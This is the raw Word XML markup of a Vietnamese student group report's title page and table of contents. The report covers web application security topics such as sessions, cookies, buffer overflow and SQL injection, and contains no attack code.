          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Huỳnh Nguyên Chính</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="140D7C87" w14:textId="4E13A43B" w:rsidR="007C1F99" w:rsidRDefault="007C1F99" w:rsidP="007C1F99">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C1F99">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Hồ Huy Hoàng</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C1F99">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">18110284 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10B2F04F" w14:textId="62904A24" w:rsidR="007C1F99" w:rsidRDefault="007C1F99" w:rsidP="007C1F99">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C1F99">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Lâm Quốc Khánh</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C1F99">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">18110304 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="628F1AD5" w14:textId="547937B2" w:rsidR="007C1F99" w:rsidRDefault="007C1F99" w:rsidP="007C1F99">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C1F99">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Trần Quốc Nam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C1F99">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">18110323 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10AAF3EC" w14:textId="495A81BA" w:rsidR="007C1F99" w:rsidRDefault="007C1F99" w:rsidP="007C1F99">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C1F99">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Nguyễn Trần Phúc</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7C1F99">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">18110339 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A99747A" w14:textId="77777777" w:rsidR="007C1F99" w:rsidRDefault="007C1F99" w:rsidP="007C1F99">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C1F99">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Nguyễn Huỳnh Minh Tiến</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="007C1F99">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>18110377</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35F586CA" w14:textId="77777777" w:rsidR="00E42092" w:rsidRDefault="00E42092" w:rsidP="00E42092">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F317A87" w14:textId="4EB709D8" w:rsidR="00E42092" w:rsidRPr="007C1F99" w:rsidRDefault="00E42092" w:rsidP="00E42092">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:sectPr w:rsidR="00E42092" w:rsidRPr="007C1F99">
          <w:footerReference w:type="default" r:id="rId9"/>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="720" w:footer="720" w:gutter="0"/>
          <w:cols w:space="720"/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Thành phố Hồ Chí Minh</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>, ngày 2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> tháng 12 năm 202</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
    </w:p>
    <w:sdt>
      <w:sdtPr>
        <w:id w:val="11450861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B518D3" w14:textId="2E4CCAED" w:rsidR="005E1B43" w:rsidRPr="005E1B43" w:rsidRDefault="005E1B43" w:rsidP="005E1B43">
          <w:pPr>
            <w:pStyle w:val="TOCHeading"/>
            <w:jc w:val="center"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:b/>
              <w:bCs/>
              <w:color w:val="auto"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="005E1B43">
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:b/>
              <w:bCs/>
              <w:color w:val="auto"/>
            </w:rPr>
            <w:t>Mục lục</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="3DEE06E8" w14:textId="2BBBB8E6" w:rsidR="005E1B43" w:rsidRPr="005E1B43" w:rsidRDefault="005E1B43">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="440"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="005E1B43">
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidRPr="005E1B43">
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> TOC \o "1-3" \h \z \u </w:instrText>
          </w:r>
          <w:r w:rsidRPr="005E1B43">
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:hyperlink w:anchor="_Toc59634004" w:history="1">
            <w:r w:rsidRPr="005E1B43">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>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cơ bản.</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4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3</w:t>
            </w:r>
            <w:r w:rsidRPr="005E1B43">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6F8BCE97" w14:textId="33DBF867"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05" w:history="1">
            <w:r w:rsidRPr="005E1B43">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>1.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ứng dụng web</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5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3</w:t>
            </w:r>
            <w:r w:rsidRPr="005E1B43">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="61816EAA" w14:textId="4BADC1E9"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06" w:history="1">
            <w:r w:rsidRPr="005E1B43">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>1.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Hoạt động của ứng dụng web</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6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5</w:t>
            </w:r>
            <w:r w:rsidRPr="005E1B43">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3D7F5AAE" w14:textId="428CB9F7"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07" w:history="1">
            <w:r w:rsidRPr="005E1B43">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>1.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Hacker</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7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5</w:t>
            </w:r>
            <w:r w:rsidRPr="005E1B43">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="59C6A6C4" w14:textId="0C0CA026"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08" w:history="1">
            <w:r w:rsidRPr="005E1B43">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>1.4.</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HTTP Header</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8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6</w:t>
            </w:r>
            <w:r w:rsidRPr="005E1B43">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="34F89A13" w14:textId="563AD0E5"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09" w:history="1">
            <w:r w:rsidRPr="005E1B43">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>1.5.</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Session</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09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7</w:t>
            </w:r>
            <w:r w:rsidRPr="005E1B43">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="403BA1D2" w14:textId="4A13C1CE"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0" w:history="1">
            <w:r w:rsidRPr="005E1B43">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>1.6.</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Cookie</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0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8</w:t>
            </w:r>
            <w:r w:rsidRPr="005E1B43">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4ABBC3BD" w14:textId="3438AC74"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1" w:history="1">
            <w:r w:rsidRPr="005E1B43">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>1.7.</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 Proxy</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1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0</w:t>
            </w:r>
            <w:r w:rsidRPr="005E1B43">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="20510A52" w14:textId="1BE3FB72" w:rsidR="005E1B43" w:rsidRPr="005E1B43" w:rsidRDefault="005E1B43">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="440"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc59634012" w:history="1">
            <w:r w:rsidRPr="005E1B43">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>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Quá trình tấn công của hacker</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2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0</w:t>
            </w:r>
            <w:r w:rsidRPr="005E1B43">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6005AB67" w14:textId="5F750FAA"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3" w:history="1">
            <w:r w:rsidRPr="005E1B43">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>2.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Thu thập thông tin</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3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0</w:t>
            </w:r>
            <w:r w:rsidRPr="005E1B43">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="548D706C" w14:textId="3D8DB181"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4" w:history="1">
            <w:r w:rsidRPr="005E1B43">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>2.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ảo sát ứng dụng web</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4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2</w:t>
            </w:r>
            <w:r w:rsidRPr="005E1B43">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="511ECF8D" w14:textId="3DAA6244"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5" w:history="1">
            <w:r w:rsidRPr="005E1B43">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>2.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Tấn cô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5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3</w:t>
            </w:r>
            <w:r w:rsidRPr="005E1B43">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="260D38C7" w14:textId="326AAB2B" w:rsidR="005E1B43" w:rsidRPr="005E1B43" w:rsidRDefault="005E1B43">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="440"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc59634016" w:history="1">
            <w:r w:rsidRPr="005E1B43">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>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Một số kiểu tấn công Ứng dụng web</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6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4</w:t>
            </w:r>
            <w:r w:rsidRPr="005E1B43">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6447FAFD" w14:textId="368A61D6"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17" w:history="1">
            <w:r w:rsidRPr="005E1B43">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>3.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Tràn bộ đệm (Buffer Overflow)</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7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4</w:t>
            </w:r>
            <w:r w:rsidRPr="005E1B43">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3874ADCD" w14:textId="0082AED7"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18" w:history="1">
            <w:r w:rsidRPr="005E1B43">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>3.1.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8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4</w:t>
            </w:r>
            <w:r w:rsidRPr="005E1B43">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6F3C6EE8" w14:textId="578CACA1"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19" w:history="1">
            <w:r w:rsidRPr="005E1B43">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>3.1.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Sơ đồ tổ chức bộ nhớ</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19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4</w:t>
            </w:r>
            <w:r w:rsidRPr="005E1B43">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7C77A786" w14:textId="63ACB849"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0" w:history="1">
            <w:r w:rsidRPr="005E1B43">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>3.1.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Một số các gây tràn bộ đệm</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0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5</w:t>
            </w:r>
            <w:r w:rsidRPr="005E1B43">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1562B997" w14:textId="0A65E721"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1" w:history="1">
            <w:r w:rsidRPr="005E1B43">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>3.1.4.</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ách phòng chố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1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5</w:t>
            </w:r>
            <w:r w:rsidRPr="005E1B43">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="07769DB7" w14:textId="4FD1DD09"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22" w:history="1">
            <w:r w:rsidRPr="005E1B43">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>3.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hèn câu truy vấn SQL (SQL Injection)</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2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6</w:t>
            </w:r>
            <w:r w:rsidRPr="005E1B43">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6C8D305F" w14:textId="0CA0C57C"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3" w:history="1">
            <w:r w:rsidRPr="005E1B43">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>3.2.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3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6</w:t>
            </w:r>
            <w:r w:rsidRPr="005E1B43">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7F85A3DE" w14:textId="311058E5"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4" w:history="1">
            <w:r w:rsidRPr="005E1B43">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>3.2.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ác cách tấn cô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4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6</w:t>
            </w:r>
            <w:r w:rsidRPr="005E1B43">
              <w:rPr>
